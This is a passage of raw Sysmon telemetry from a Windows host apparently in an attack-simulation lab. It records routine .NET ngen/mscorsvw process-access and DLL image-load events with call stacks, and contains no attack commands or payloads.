svc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006290Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:01.430{08A6967A-4579-6000-3302-000000009A01}744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\2e8-0\PresentationFramework.AeroLite.dll2021-01-14 13:22:01.430 10341000x80000000000000006289Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.274{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4579-6000-3302-000000009A01}744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006288Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.259{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4579-6000-3302-000000009A01}744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006287Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.259{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4579-6000-3302-000000009A01}744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006286Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.212{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4579-6000-3202-000000009A01}4032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006285Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.196{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4579-6000-3202-000000009A01}4032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006284Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.196{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4579-6000-3202-000000009A01}4032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006283Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:01.118{08A6967A-4578-6000-3102-000000009A01}2192C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\890-0\PresentationFramework.Aero.dll2021-01-14 13:22:01.118 10341000x80000000000000006314Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:02.852{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-457A-6000-3A02-000000009A01}4372C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006313Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:02.837{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-457A-6000-3A02-000000009A01}4372C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006312Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:02.837{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-457A-6000-3A02-000000009A01}4372C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006311Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:02.774{08A6967A-457A-6000-3902-000000009A01}4368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1110-0\PresentationFramework.Royale.dll2021-01-14 13:22:02.774 10341000x80000000000000006310Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:02.493{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-457A-6000-3902-000000009A01}4368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006309Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:02.493{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-457A-6000-3902-000000009A01}4368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006308Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:02.493{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-457A-6000-3902-000000009A01}4368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006307Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:02.430{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-457A-6000-3802-000000009A01}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006306Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:02.415{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-457A-6000-3802-000000009A01}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006305Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:02.415{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-457A-6000-3802-000000009A01}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006304Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:02.352{08A6967A-4579-6000-3702-000000009A01}3404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d4c-0\PresentationFramework.Luna.dll2021-01-14 13:22:02.352 10341000x80000000000000006317Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:03.071{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-457B-6000-3B02-000000009A01}3588C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006316Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:03.055{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-457B-6000-3B02-000000009A01}3588C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006315Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:03.055{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-457B-6000-3B02-000000009A01}3588C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006324Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:04.352{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-457C-6000-3D02-000000009A01}1360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006323Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:04.337{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-457C-6000-3D02-000000009A01}1360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006322Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:04.337{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-457C-6000-3D02-000000009A01}1360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006321Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:04.243{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-457C-6000-3C02-000000009A01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006320Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:04.227{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-457C-6000-3C02-000000009A01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006319Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:04.227{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-457C-6000-3C02-000000009A01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C: